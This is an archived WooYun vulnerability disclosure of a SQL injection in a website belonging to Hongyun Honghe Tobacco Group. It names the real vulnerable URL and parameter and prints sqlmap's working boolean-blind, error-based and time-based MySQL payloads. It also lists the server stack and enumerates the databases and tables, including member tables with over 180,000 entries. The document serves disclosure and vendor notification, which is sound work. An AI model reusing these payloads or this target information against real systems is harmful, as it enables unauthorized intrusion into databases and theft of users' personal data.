当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0169165

漏洞标题:红云红河烟草(集团)有限责任公司某站SQL注入

相关厂商:红云红河烟草(集团)有限责任公司

漏洞作者: 蝶.!

提交时间:2016-01-17 22:14

修复时间:2016-02-27 11:49

公开时间:2016-02-27 11:49

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-17: 细节已通知厂商并且等待厂商处理中
2016-01-20: 厂商已经确认,细节仅向厂商公开
2016-01-30: 细节向核心白帽子及相关领域专家公开
2016-02-09: 细节向普通白帽子公开
2016-02-19: 细节向实习白帽子公开
2016-02-27: 细节向公众公开

简要描述:

红云红河烟草(集团)有限责任公司某站SQL注入

详细说明:

注入点:http://club.zerone.me/space.php?uid=14208&do=blog&id=69562

sqlmap identified the following injection point(s) with a total of 4089 HTTP(s) requests:
---
Parameter: uid (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: uid=14208 RLIKE (SELECT (CASE WHEN (6623=6623) THEN 14208 ELSE 0x28 END))&do=blog&id=69562
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: uid=14208 AND (SELECT 1884 FROM(SELECT COUNT(*),CONCAT(0x7176787a71,(SELECT (ELT(1884=1884,1))),0x716b786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&do=blog&id=69562
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: uid=14208 AND (SELECT * FROM (SELECT(SLEEP(5)))jGrv)&do=blog&id=69562
---
web server operating system: Linux CentOS 5.10
web application technology: PHP 5.2.6, Apache 2.2.3
back-end DBMS: MySQL 5.0
available databases [3]:
[*] information_schema
[*] uc_hhtest
[*] uchome_hhtest
web server operating system: Linux CentOS 5.10
web application technology: PHP 5.2.6, Apache 2.2.3
back-end DBMS: MySQL 5.0
Database: uc_hhtest
+---------------------+---------+
| Table | Entries |
+---------------------+---------+
| uc_members | 181769 |
| uc_memberfields | 133594 |
| uc_friends | 98153 |
| uc_members_copy | 33783 |

漏洞证明:

web server operating system: Linux CentOS 5.10
web application technology: PHP 5.2.6, Apache 2.2.3
back-end DBMS: MySQL 5.0
Database: uchome_hhtest
+-------------------------+---------+
| Table | Entries |
+-------------------------+---------+
| panda_card | 4310000 |
| rd_ticketdate | 1021335 |
| uchome_comment | 427626 |
| ip_addr | 379739 |
| uchome_friend | 316635 |
| uchome_pic | 301699 |
| uchome_post | 205451 |
| cr_ticketdate | 150343 |
| uchome_space | 143744 |
| uchome_spacefield | 143744 |
| uchome_member | 143716 |
| uchome_notification | 128831 |
| uchome_poke | 127263 |
| wyyn_tj_copy | 108158 |
| wyyn_cent | 63828 |
| uchome_blogfield | 51134 |
| uchome_blog | 51041 |
| wyyn_cent_2 | 47307 |
| uchome_thread | 45734 |
| uchome_member_copy | 32810 |
| uchome_member_copy1 | 32799 |
| uchome_space_copy1 | 32777 |
| uchome_spacefield_copy1 | 32777 |
| uchome_space_copy | 32766 |
| uchome_spacefield_copy | 32766 |
| uchome_tagblog | 29405 |
| chun_tj | 29070 |
| uc_members_copy | 27534 |
| wyyn_member | 21645 |
| wyyn_statemember | 21643 |
| wyyn3_statemember | 20760 |
| wyyn_wj | 20666 |
| wyyn_statemember_9 | 20249 |
| wyyn_statemember_8 | 19821 |
| wyyn_statemember_7 | 19384 |
| wyyn_statemember_6 | 18636 |
| cr_ticketpeople | 18445 |
| wyyn_cent_1 | 18311 |
| wyyn_statemember_5 | 17529 |
| wyyn_statemember_4 | 16376 |
| wyyn_statemember_3 | 14898 |
| panda_list | 14792 |
| uchome_invite | 14508 |
| uchome_userapp | 12262 |
| ck_isck | 11439 |
| uchome_tag | 11375 |
| uch_tobacco_ground | 8816 |
| wyyn_statemember_2 | 8166 |
| uchome_tagspace | 8002 |
| wyyn_tj | 7895 |
| uchome_spacelog | 7606 |
| uchome_usertask | 6992 |
| cr_ticket | 6658 |
| rd_ticketpeople | 6602 |
| uchome_myinvite | 4825 |
| fl_list | 3838 |
| uch_tobacco | 3785 |
| wyyn_statemember_091008 | 3666 |
| wyyn_statemember_1 | 3666 |
| wyyn_invte | 3325 |
| uch_hhlink | 3279 |
| uchome_feed | 3254 |
| cr_task | 3227 |
| club_area | 3144 |
| user_collect_1 | 2692 |
| uch_tobacco_zhongzi | 2582 |
| user_collect_1_1 | 2490 |
| uch_hhfind | 2466 |
| fl_heart | 2383 |
| fl_quest | 2383 |
| fl_sub | 2383 |
| uch_cars | 2205 |
| `user` | 2034 |
| uchome_album | 1987 |
| uchome_share | 1869 |
| chun_list | 1654 |
| chun_list_01 | 1577 |
| uchome_spacefieldcom | 1364 |
| uch_tobacco_product | 1206 |
| chun_list_03 | 1158 |
| chun_list_02 | 1126 |
| chun_list_04 | 1048 |
| uchome_doing | 829 |
| app_online | 564 |
| qq_long | 550 |
| uchome_saver | 514 |
| app_online2 | 458 |
| uchome_mtaginvite | 450 |
| club_city | 345 |
| uchome_class | 319 |
| pic_count | 287 |
| wyyn_tk | 215 |
| uch_music | 213 |
| uchome_docomment | 168 |
| uchome_myapp | 167 |
| uchome_mtag | 160 |
| uchome_userlog | 158 |
| appetsy | 103 |
| app_webapp_pic | 86 |
| uchome_config | 83 |
| uchome_data | 67 |
| uchome_report | 60 |
| reader_addr | 57 |
| appsrh | 41 |
| p_list | 41 |
| uch_dl | 35 |
| uchome_blacklist | 35 |
| club_province | 34 |
| rtwo | 30 |
| wyyn3_cardget | 29 |
| chun_postab | 28 |
| `2010pl` | 27 |
| vip_list | 25 |
| wyyn_2cj | 25 |
| wyyn_2cj_4 | 25 |
| wyyn_2cj_5 | 25 |
| wyyn_2cj_6 | 25 |
| wyyn_2cj_7 | 25 |
| wyyn_2cj_8 | 25 |
| chun_postab_3 | 24 |
| app_webapp | 22 |
| wyyn_2cj_1 | 21 |
| chun_postab_02 | 20 |
| wyyn_2cj_2 | 20 |
| wyyn_2cj_3 | 20 |
| apptxjh | 18 |
| chun_postab_01 | 16 |
| bbs_typename | 14 |
| uchome_checkusermail | 12 |
| zp_bm | 12 |
| uchome_usergroup | 11 |
| cr_ticketname | 8 |
| rd_ticket | 7 |
| uchome_checkuserphone | 6 |
| uchome_checkuserpost | 6 |
| uchome_task | 6 |
| uchome_cron | 5 |
| uchome_friendlog | 5 |
| uchome_profilefield | 5 |
| apppassat | 3 |
| rd_ticketname | 3 |
| uchome_profield | 3 |
| gps_map | 2 |
| uch_tobacco_grass | 2 |
| uchome_log | 2 |
| vip_shop | 2 |
| chun_sum | 1 |
| uchome_session | 1 |
| uchome_show | 1 |
| wyyn_sum | 1 |
| wyyn_sum_copy | 1 |
| wyyn_ykc | 1 |
+-------------------------+---------+

修复方案:

版权声明:转载请注明来源 蝶.!@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2016-01-20 15:08

厂商回复:

CNVD确认未复现所述情况,已经转由CNCERT下发给云南分中心,由其后续协调网站管理单位处置.

最新状态:

暂无